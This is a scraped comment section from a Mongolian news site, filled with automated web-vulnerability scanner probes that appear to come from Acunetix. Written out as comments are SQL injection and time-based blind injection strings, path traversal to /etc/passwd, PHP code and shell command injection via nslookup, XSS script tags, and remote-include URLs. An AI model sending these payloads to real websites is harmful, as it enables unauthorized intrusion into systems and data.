
1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:53

-1" OR 2+475-475-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:53

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:53

../../../../../../../../../../etc/passwd.jpg

GRLpGpAG [{{9999788*9999995}}] 2020-10-29 03:29:52

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:52

\

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:52

-1' OR 2+232-232-1=0+0+0+1 or 'wyrZ4Xwe'='

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:52

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:52

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:52

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:51

-1' OR 2+618-618-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:51

1'"

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:51

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:51

../../../../../../../../../../../../../../../proc/version

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:51

-1 OR 2+959-959-1=0+0+0+1

GRLpGpAG [acux6281] 2020-10-29 03:29:51

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:50

../../../../../../../../../../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:50

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:49

-1 OR 2+542-542-1=0+0+0+1 --

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:49

1

GRLpGpAG [acu9074<s1﹥s2ʺs3ʹuca9074] 2020-10-29 03:29:48

1

<!-- [116.113.93.82] 2020-10-29 03:29:48

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:48

ykbPGSzr

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:48

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:47

1

'" [116.113.93.82] 2020-10-29 03:29:47

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:47

1

GRLpGpAG [116.113.93.829163476] 2020-10-29 03:29:46

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:46

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:46

<!--

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-29 03:29:46

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:46

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:45

1

${@print(md5(acunetix_wvs_security_test))} [116.113.93.82] 2020-10-29 03:29:45

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:45

'"

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:44

1

";print(md5(acunetix_wvs_security_test));$a=" [116.113.93.82] 2020-10-29 03:29:44

1

GRLpGpAG ['"()&%<acx><ScRiPt >er95(9844)</ScRiPt>] 2020-10-29 03:29:44

1

create/. [116.113.93.82] 2020-10-29 03:29:43

1

GRLpGpAG [] 2020-10-29 03:29:43

1

';print(md5(acunetix_wvs_security_test));$a=' [116.113.93.82] 2020-10-29 03:29:43

1

/www.vulnweb.com [116.113.93.82] 2020-10-29 03:29:43

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:43

1

create [116.113.93.82] 2020-10-29 03:29:42

1

GRLpGpAG [] 2020-10-29 03:29:42

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:42

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:42

/www.vulnweb.com

;print(md5(acunetix_wvs_security_test)); [116.113.93.82] 2020-10-29 03:29:42

1

GRLpGpAG [<!--] 2020-10-29 03:29:42

1

GRLpGpAG [116.113.93.82'"()&%<acx><ScRiPt >er95(9727)</ScRiPt>] 2020-10-29 03:29:42

1

GRLpGpAG [JyI=] 2020-10-29 03:29:41

1

create [116.113.93.82] 2020-10-29 03:29:41

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:41

${@print(md5(acunetix_wvs_security_test))}\

))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))) [116.113.93.82] 2020-10-29 03:29:41

1

GRLpGpAG ['"] 2020-10-29 03:29:41

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:41

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:41

create/.

GRLpGpAG [/www.vulnweb.com] 2020-10-29 03:29:41

1

GRLpGpAG [@@8mYKO] 2020-10-29 03:29:41

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:40

${@print(md5(acunetix_wvs_security_test))}

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:40

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:40

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:39

create

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:39

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:39

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [1] 2020-10-29 03:29:39

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:39

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:38

create

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:38

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:38

';print(md5(acunetix_wvs_security_test));$a='

GRLpGpAG [\] 2020-10-29 03:29:38

1

http://hitsxV2To2G7b.bxss.me/ [116.113.93.82] 2020-10-29 03:29:38

1

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-29 03:29:37

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:37

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:37

1

GRLpGpAG [1'"] 2020-10-29 03:29:37

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:36

http://hit2N5hAOtLJH.bxss.me/

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:36

1

testasp.vulnweb.com [116.113.93.82] 2020-10-29 03:29:35

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-29 03:29:35

1

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-29 03:29:34

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:34

1

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-29 03:29:34

1

GRLpGpAG [http://hit8J72Oa1xw6.bxss.me/] 2020-10-29 03:29:33

1

GRLpGpAG [create/.] 2020-10-29 03:29:33

1

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-29 03:29:33

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:33

testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:32

1

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-29 03:29:32

1

GRLpGpAG [create] 2020-10-29 03:29:32

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:32

1

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-29 03:29:32

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:32

HttP://testasp.vulnweb.com/t/xss.html?%00

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:32

1

GRLpGpAG [create] 2020-10-29 03:29:31

1

!(()&&!|*|*| [116.113.93.82] 2020-10-29 03:29:31

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-29 03:29:31

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-29 03:29:31

1

) [116.113.93.82] 2020-10-29 03:29:31

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:31

testasp.vulnweb.com

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-29 03:29:30

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:29

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:29

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [WEB-INF\web.xml] 2020-10-29 03:29:29

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:29

^(#$!@#$)(()))******

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-29 03:29:29

1

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-29 03:29:28

1

'"() [116.113.93.82] 2020-10-29 03:29:28

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:28

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [WEB-INF/web.xml] 2020-10-29 03:29:28

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:28

!(()&&!|*|*|

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-29 03:29:28

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-29 03:29:27

1

Array [116.113.93.82] 2020-10-29 03:29:27

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:27

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:27

1

Array [116.113.93.82] 2020-10-29 03:29:27

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-29 03:29:27

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:27

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:27

)

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:27

1

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-29 03:29:27

1

Array [116.113.93.82] 2020-10-29 03:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:26

'"()

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-29 03:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:26

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:25

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:25

1

GRLpGpAG [file:///etc/passwd] 2020-10-29 03:29:25

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-29 03:29:25

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:25

Array

GRLpGpAG&n943983=v992050 [116.113.93.82] 2020-10-29 03:29:24

1

GRLpGpAG [3tmBrVAp'));select pg_sleep(6); -- ] 2020-10-29 03:29:24

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:24

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:24

1

GRLpGpAG [1b8CF0gt');select pg_sleep(3); -- ] 2020-10-29 03:29:23

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-29 03:29:23

1

Зочин [116.113.93.82] 2020-10-29 03:29:23

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:23

1

GRLpGpAG [4zjULNH1';select pg_sleep(9); -- ] 2020-10-29 03:29:23

1

GRLpGpAG [..] 2020-10-29 03:29:23

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:22

1&n907480=v915291

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:22

Array

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-29 03:29:22

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-29 03:29:22

1

GRLpGpAG ['"()] 2020-10-29 03:29:22

1

GRLpGpAG [Gdb4xy8q'; waitfor delay '0:0:9' -- ] 2020-10-29 03:29:22

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:22

Array

GRLpGpAG [!(()&&!|*|*|] 2020-10-29 03:29:21

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-29 03:29:21

1

GRLpGpAG [1 waitfor delay '0:0:6' -- ] 2020-10-29 03:29:21

1

GRLpGpAG [Array] 2020-10-29 03:29:21

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:21

12345'"\'\");|]*{ <>

GRLpGpAG [)] 2020-10-29 03:29:21

1

&nslookup DrAlLO7s&'\"`0&nslookup DrAlLO7s&`' [116.113.93.82] 2020-10-29 03:29:20

1

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-29 03:29:20

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:20

1

GRLpGpAG [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-29 03:29:20

1

GRLpGpAG [116.113.93.82&n994226=v956889] 2020-10-29 03:29:20

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:20

"+response.write(9444463*9201179)+" [116.113.93.82] 2020-10-29 03:29:19

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-29 03:29:19

1

ZDlMS1d4Qkc= [116.113.93.82] 2020-10-29 03:29:19

1

$(nslookup FYKU4gGj) [116.113.93.82] 2020-10-29 03:29:19

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-29 03:29:19

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:19

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-29 03:29:19

1

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-29 03:29:18

1

set|set&set [116.113.93.82] 2020-10-29 03:29:18

1

'+response.write(9444463*9201179)+' [116.113.93.82] 2020-10-29 03:29:18

1

${9999812+9999842} [116.113.93.82] 2020-10-29 03:29:18

1

GRLpGpAG [/etc/passwd] 2020-10-29 03:29:18

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:18

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(3),0))XOR'Z] 2020-10-29 03:29:17

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-29 03:29:17

1

response.write(9444463*9201179) [116.113.93.82] 2020-10-29 03:29:17

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:17

${10000106+10000363}

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:17

&nslookup hHoBQ7D6&'\"`0&nslookup hHoBQ7D6&`'

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-29 03:29:17

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-29 03:29:17

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-29 03:29:16

1

GRLpGpAG [if(now()=sysdate(),sleep(3),0)] 2020-10-29 03:29:16

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:16

"+response.write(9025316*9414108)+"

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:16

$(nslookup AY2gdJmE)

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:16

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-29 03:29:16

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-29 03:29:15

1

GRLpGpAG [-1" OR 2+655-655-1=0+0+0+1 -- ] 2020-10-29 03:29:15

1

GRLpGpAG [${10000443+10000429}] 2020-10-29 03:29:15

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:15

'+response.write(9025316*9414108)+'

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:15

set|set&set

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-29 03:29:14

1

GRLpGpAG [-1' OR 2+93-93-1=0+0+0+1 or '5Bv6mhYU'='] 2020-10-29 03:29:14

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:14

1

GRLpGpAG [Array] 2020-10-29 03:29:14

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:13

response.write(9025316*9414108)

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-29 03:29:13

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-29 03:29:13

1

GRLpGpAG [-1' OR 2+976-976-1=0+0+0+1 -- ] 2020-10-29 03:29:13

1

GRLpGpAG [Array] 2020-10-29 03:29:13

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-29 03:29:12

1

00vLffxe [116.113.93.82] 2020-10-29 03:29:12

1

GRLpGpAG [-1 OR 2+399-399-1=0+0+0+1] 2020-10-29 03:29:12

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-29 03:29:12

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-29 03:29:12

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:11

UgGRMtBc

GRLpGpAG [-1 OR 2+381-381-1=0+0+0+1 -- ] 2020-10-29 03:29:11

1

GRLpGpAG [] 2020-10-29 03:29:11

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-29 03:29:11

1

GRLpGpAG [&nslookup TrUD7Q0K&'\"`0&nslookup TrUD7Q0K&`'] 2020-10-29 03:29:11

1

GRLpGpAG [5wFYMYob] 2020-10-29 03:29:11

1

GRLpGpAG ["+response.write(9350671*9572780)+"] 2020-10-29 03:29:10

1

GRLpGpAG [$(nslookup 9zmFJYiY)] 2020-10-29 03:29:10

1

GRLpGpAG [obUHEALl] 2020-10-29 03:29:09

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:09

1

GRLpGpAG ['+response.write(9350671*9572780)+'] 2020-10-29 03:29:09

1

GRLpGpAG [set|set&set] 2020-10-29 03:29:08

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:29:08

1

GRLpGpAG [response.write(9350671*9572780)] 2020-10-29 03:29:07

1

GRLpGpAG [116.113.93.82] 2020-10-29 03:25:45

1

zochin [119.40.100.66] 2020-06-25 15:50:11

hi


477 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
477 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.